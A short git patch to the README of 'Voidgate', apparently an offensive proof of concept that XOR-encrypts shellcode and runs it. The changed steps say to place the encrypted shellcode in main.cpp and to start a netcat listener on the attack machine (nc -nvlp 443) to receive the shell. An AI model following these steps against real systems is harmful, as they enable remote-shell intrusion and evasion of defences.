From 73ec6e9dd440c9e857339ea300b30f6435b70d6c Mon Sep 17 00:00:00 2001 From: vxCrypt0r <76695257+vxCrypt0r@users.noreply.github.com> Date: Wed, 12 Jun 2024 00:28:05 -0700 Subject: [PATCH] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2de1a68..805e9a3 100644 --- a/README.md +++ b/README.md @@ -36,9 +36,9 @@ How to reproduce the POC: ``` ./XorEncryptPayload.exe C:\Path\to\shell.asm ``` -* 3.) Update it inside the main.cpp of Voidgate project +* 3.) Update the variable which contains the shellcode inside the main.cpp of Voidgate project * 4.) Ensure the xor key matches the encryptor and Voidgate project -* 5.) Ensure your listener is waiting for the shellcode +* 5.) Ensure your listener is waiting on the attack machine: ``` nc -nvlp 443 ```